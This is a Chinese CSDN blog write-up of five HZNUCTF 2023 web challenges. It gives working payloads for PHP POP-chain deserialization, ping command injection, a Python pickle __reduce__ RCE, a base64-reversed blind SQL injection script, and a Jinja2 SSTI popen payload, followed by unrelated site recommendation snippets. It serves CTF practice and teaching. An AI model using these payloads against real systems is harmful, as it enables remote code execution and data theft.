NSSCTF-[HZNUCTF 2023 preliminary]-web

已于 2023-11-29 11:04:52 修改
阅读量605 收藏
点赞数
文章标签: 网络安全 web安全 前端
于 2023-11-13 19:05:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/J1ng_Hong/article/details/134381267
版权

目录

0x01 [HZNUCTF 2023 preliminary]ppppop

0x02 [HZNUCTF 2023 preliminary]guessguessguess

0x03 [HZNUCTF 2023 preliminary]pickle

0x04 [HZNUCTF 2023 preliminary]ezlogin

0x05 [HZNUCTF 2023 preliminary]flask

0x01 [HZNUCTF 2023 preliminary]ppppop

进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。所以尝试一下burp抓包,然后我们看到cookie里面有一个base64编码,拿去解码得到:

O:4:"User":1:{s:7:"isAdmin";b:0;}

 由于序列化中的b代表着Boolean,所以我试着把0改为1。发现有回显了:

发现是pop链构造,我们先构造pop链:

它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。所以我们构造pop链如下:

$a=new A();
$a->className='B';
$a->args='ls /';
$a->funcName='system'; 

 之后因为题目中$payload变量经过base64解码已经字符串逆序,我们在phpstorm中直接将这两个解开并且POST传参即可:

echo base64_encode(strrev(serialize($a)));

得到payload:

fTsiLyBzbCI6NDpzOyJzZ3JhIjo0OnM7Im1ldHN5cyI6NjpzOyJlbWFOY251ZiI6ODpzOy

JCIjoxOnM7ImVtYU5zc2FsYyI6OTpzezozOiJBIjoxOk8=

然后拿着这个给post传参:

然后我们就看到了回显,但是没找到flag。去环境变量里找找,payload:

$a=new A();
$a->className='B';
$a->args='env';
$a->funcName='system';

找到了flag。

0x02 [HZNUCTF 2023 preliminary]guessguessguess

进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。看到搜索框上有个hint,我们输入tnih试试,hint显示:

我们发现他的hint居然是命令执行,而不是sql注入。然后我发现这里post的参数是cmd,所以直接在hackbar里尝试。我尝试着输入system('ls /')查看根目录,并且将此字符串逆序:)'/ sl'(metsys,但是没有回显。直接ls也没有回显:

所以我去看了wp。wp说这题是ping......这是我根本没想到的。所以我去ping一个127.0.0.1的逆序:1.0.0.721,发现他下面的猜猜猜没了:

然后管道符分隔,试试system。发现又没有回显,那我们直接ls /试试:

发现根目录没有flag。那我们直接去环境变量里找一下:

就找到了flag。

0x03 [HZNUCTF 2023 preliminary]pickle

进题看见代码,是python的语句,并且用flask模块,我们拉到pycharm里面格式化一下:

发现有两个可以访问的页面:/calc和/readFile。由于calc下面的语句有一个getFlag,我认为flag应该是在这里拿到的。然后往下看,需要get传参payload,然后用base64解码payload,然后pickle.loads被过滤os的解码代码。先去查了pickle的用法,发现是python里的序列化和反序列化函数。然后os过滤当时看的一脸懵,所以我去看了wp。

wp出处:NSSCTF | 在线CTF平台(jmx0hxq师傅):

在外部自己写一个脚本,并且定义一个类,用到了__reduce__的魔术方法。

在这里有几个地方很需要记录:

1. 首先,python代码里先进行return以覆盖下一个return的返回值。所以本题可以让反序列化之后的值先进行return的操作。

2. 然后本题中return的那段:

return eval,("__import__('o'+'s').system('env | tee a')",)

 这段的意思,有两个元素用逗号隔开return,就是一个可以执行eval的特性。

3. 其中还有一个__import__('os')语句的意思,就是在中途导入os模块,并且将__import__('os')这一段变成'os'。

4.python中,os就是可以调用system的函数:

os模块负责程序与操作系统的交互,提供了访问操作系统底层的接口;即os模块提供了非常丰富的方法用来处理文件和目录。

所以os.system('ls /')也是可以读取根目录的。但是由于eval函数没有回显,所以用tee将内容复制到a.txt,然后再用/readFile函数读取文件就可以了。

所以payload:

/calc?payload=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnbycrJ3MnKS5zeXN0ZW0oJ2xzIC8gfCB0ZWUgYScplIWUUpQu

 然后读取a文件:

然后发现没有flag。我们去环境变量里找一下:

return eval, ("__import__('o'+'s').system('env | tee a",)

并且用刚刚的脚本加密再重复刚刚的步骤:

然后就能在环境变量中找到flag了。

0x04 [HZNUCTF 2023 preliminary]ezlogin

进题是一个登录界面,以为是爆破题。但是标签显示是sql注入。然后我们抓包发包看到了hint:

过滤了联合注入,说明确实是sql注入题。但是没有回显,我们使用时间盲注检查闭合,但是它有base64解码并且字符串逆序,我们在php再反向操作一次,然后payload:

IykxLCk1KHBlZWxzLDEoZml8fCcx

这一段的源代码是:1'||if(1,sleep(5),1)#

然后发现回应特别慢,所以本题的闭合是单引号闭合。

接下来由于联合注入被ban了,database也被ban了。但是它最后没有加/i,所以可以大小写绕过。

但是接下来只能使用布尔盲注了,这里是网上的脚本:

import requests
import base64
import datetime

url='http://node5.anna.nssctf.cn:28144/'
flag = ''

for i in range(1,100):
    low = 32
    high = 130
    mid = (high + low) // 2
    while (low < high):
        payload = "1'||if((ascii(substr((SELECT/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1)))>{},sleep(1),1)#"

        payload = payload.format(i, mid)
        print(payload)
        payload = base64.b64encode(payload[::-1].encode("utf-8"))
        data = {
            'username':payload,
            'passwd':'1'
        }
        time1 = datetime.datetime.now()
        r = requests.post(url, data)
        time2 = datetime.datetime.now()
        time = (time2 - time1).seconds
        if time > 1:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 130):
        break
    flag += chr(mid)
    print(flag)
爆库名
# payload = "1'||if((ascii(substr((DATABASE()),{},1)))>{},sleep(1),1)#"

爆表名
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/DATABASE()),{},1)))>{},sleep(1),1)#"

爆列名
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'user'),{},1)))>{},sleep(1),1)#"

爆数据
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(Password)/**/from/**/users.user),{},1)))>{},sleep(1),1)#"

然后我发现Password这里面直接就有了flag。

0x05 [HZNUCTF 2023 preliminary]flask

进题看到name,并且题目名字叫flask。所以想到了ssti注入:

然后尝试了一下,发现他会逆序输出。所以payload:?name=}}6*6{{:

输出了36。所以确定是ssti注入。然后用师傅wp中的方法进行操作,payload:

{{a.__init__.__globals__['__builtins__'].eval('__import__("os").popen("env").read()')}}

前面就是用a这个类初始化,然后再用全局变量中的'builtins'变量中的eval,因为这个变量中的eval可以直接用os控制system函数,但是普通的eval不可以。

所以我们用这条语句逆序,读取出环境变量中flag的值。(尝试过ls,发现没有flag):

然后就找到了flag。

J1ng_Hong
关注
PLA5506-940-Product-Specification-Preliminary-Confidential.pdf
06-24
根据文档标题“PLA5506-940-Product-Specification-Preliminary-Confidential.pdf”以及描述“PLA5506-940-Product-Specification-Preliminary-Confidential”,该文档提供了一份关于型号为PLA5506-940的产品规格书...
HZNUCTF2023 web
weixin_63231007的博客
05-07 1895
HZNUCTF校赛 赛后复现
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1510
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
[HZNUCTF 2023 preliminary]flask
最新发布
2301_80243833的博客
08-28 505
我们需要让用户输入一个字符串,对其进行反转操作,然后将反转后的字符串进行 Base64 编码,最后输出反转后的字符串。
每日练习-[HZNUCTF 2023 preliminary]flask
m0_68113265的博客
08-20 378
页面内容要求get一个name经过测试,只对语句进行倒序。查到os在132同时flag不在flag文件中。猜测flag在env中。
NSSCTF做题第9页(2)
wwwwyyyrre的博客
10-25 395
这道题主要有三个绕过点,第一个是__wakeup()函数,第二个是变量的MD5相等,但是两个变量不等那需要我们构造的两个类就是class lt和class fin构造的时候设置一个变量a,创建了一个类的对象lt然后把md5的条件满足一下,而这类的第一个变量$impo没有用到就可以利用它来指向下一个新创建的变量class fin,再利用fin里边的公共变量进行命令执行得到flagphpclass ltclass finpublic $a;
HSCSEC CTF 2023 web-EZSYFLASK-wp
……
02-24 343
flask的PIN码攻击
[HZNUCTF 2023 preliminary]ppppop
m0_70819573的博客
04-22 494
base64解密后得到序列化的字符串:O:4:"User":1:{s:7:"isAdmin";很简单的pop链构造,class A __destruct()->class B __call()通过抓包可以发现base64加密的user cookie。通过payloadpost传参获得flag。1.代开环境,发现一片空白。将零改为一后可以显示源码了。
Hydra3D-Datasheet-20200604-Preliminary.pdf
03-06
Hydra3D是一款基于飞行时间(ToF,Time-of-Flight)技术的CMOS传感器,由e2v公司出品。这款深度相机传感器旨在提供高精度、高分辨率的三维数据,适用于各种应用,包括机器人导航、增强现实、虚拟现实、工业自动化...
Java-game-programming-preliminary.rar_java programming
09-23
现在流行的游戏似乎都是用C或C++来开发的。在java平台上几乎没有很大型及可玩的流行游戏。由于java是个新生语言,他的许多特性还有待大家的发掘,但是我们不能否认Java在游戏编程方面的强大性。本文将带领大家一步...
STK3311-WV Preliminary Datasheet v0.9.rar
11-01
STK3311-WV Preliminary Datasheet v0.9.rar 芯片规格书,看到的都可以低分下载。上传这个文件是为了打抱不平,有人那么高分上传了这个文件,而非个人版权,有点欺负人了。
ME3760 TD-LTE module preliminary spec.pdf
10-05
《ME3760 TD-LTE模块初步规格详解》 ME3760 TD-LTE模块是ZTE公司推出的一款高性能、小型化的4G通信模块,设计主要用于机器对机器(M2M)应用,旨在满足高可靠性和最高速数据传输的需求。这款模块采用Mini PCI-E接口...
NSSCTF第10页(3)
wwwwyyyrre的博客
11-05 404
第一题:(1/?第三题:php// 第三个彩蛋!(看过头号玩家么?//(3/??第六题:wow 你找到了第二个彩蛋哦~_S0_ne3t?(2/?第七题:这个好像是最后一个个彩蛋拼接:_S0_ne3t?注意:题目给的提交的格式是NSSCTF{},因此:_S0_ne3t?
(反序列化)[HZNUCTF 2023 preliminary]ppppop
weixin_73668856的博客
12-08 569
简单的
pickle反序列化
rev1ve的博客
12-22 1698
与PHP类似,python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1778
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1452
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
preliminary 传感器
07-24
### 回答1: 初步的传感器是指最初的传感器,用于感知和测量环境中的物理量、化学量或生物量。这些传感器通常用于收集数据,以便进行进一步的分析和处理。 初步的传感器可以用于各种不同的应用领域,如环境监测、工业自动化、医疗诊断等。它们可以测量温度、湿度、压力、光照、声音等物理量,也可以测量气体浓度、水质、土壤成分等化学量,甚至可以测量心率、血压等生物量。 初步的传感器通常具有小巧、便携和低功耗的特点,以便于安装和使用。它们可以通过有线或无线的方式将收集到的数据传输给数据处理单元,然后进一步进行分析和应用。 初步的传感器的性能和精度通常较低,但在一些应用场景中足够使用。在进行精确测量或要求高度一致性的场景中,可能需要更复杂、更高精度的传感器来满足要求。 总之,初步的传感器是最早的传感器,用于感知和测量环境中各种物理、化学或生物的量。它们可以广泛用于各个领域,为数据采集和分析提供基础。随着科技的发展和需求的增加,传感器技术也越来越精细和复杂。 ### 回答2: Preliminary 传感器是一种用于收集初步信息或进行初步测量的传感器。它主要用于确认和验证数据,并为后续的研究和分析提供依据。 Preliminary 传感器可以通过使用多种技术来获取数据,包括光学、声波、电磁和加速度等。它可以测量环境中的不同参数,如温度、湿度、压力、光照和运动等。 与其他高精度传感器相比,preliminary 传感器通常具有较低的测量精确度和准确性。尽管如此,它们仍然可以提供足够的信息来评估某个环境或系统的基本特性。 preliminary 传感器通常应用于许多领域。在环境监测方面,它可以用于检测空气质量、水质、土壤含水量等,以便评估环境的健康状况。在工业应用中,preliminary 传感器可以帮助监测和控制生产过程中的温度、压力和湿度等参数,以确保产品质量和工艺稳定性。 此外,preliminary 传感器还可以用于智能家居系统,例如自动灯光控制和温度调节。它们可以通过监测周围环境的状态并与设定的条件进行比较,实现自动化控制和能源节约。 总而言之,preliminary 传感器提供了初步收集数据和测量环境参数的功能。尽管其测量精度较低,但它们可以在各种领域中发挥重要作用,为后续的研究和分析提供重要的参考依据。 ### 回答3: 初步传感器是指在某个领域或某项工作中,在进行深入研究或正式操作之前使用的传感器。这种传感器可以帮助人们对待测对象进行初步的观察、测量或监测。 初步传感器通常具有以下特点: 1. 快捷简易:初步传感器操作方便、使用简单。其设计和功能主要针对对待测对象的初步了解和探索,不需要过多的专业知识或复杂的操作步骤。 2. 低成本:初步传感器通常相对便宜,成本低廉。这样可以降低对待测对象的测试成本,以及在初步阶段对传感器的投入。 3. 多功能:初步传感器一般具备多种功能,可以根据不同需求进行测量、观测和监测。可以针对特定目标进行调整和适应,提供初步的数据和信息。 4. 基础应用:初步传感器广泛应用于科学研究、实验室试验、工程项目等领域。在进行具体实验或操作之前,可以通过初步传感器获得一些对象的基本特征或性质。这对进一步的研究和操作具有重要意义。 总之,初步传感器是一种方便、简单、低成本且多功能的传感器,可以在不破坏或影响待测对象的前提下,提供初步的观测、测量或监测数据。通过初步传感器的使用,人们可以更好地了解被测对象的性质和特征,为随后的研究或操作提供基础信息和决策依据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值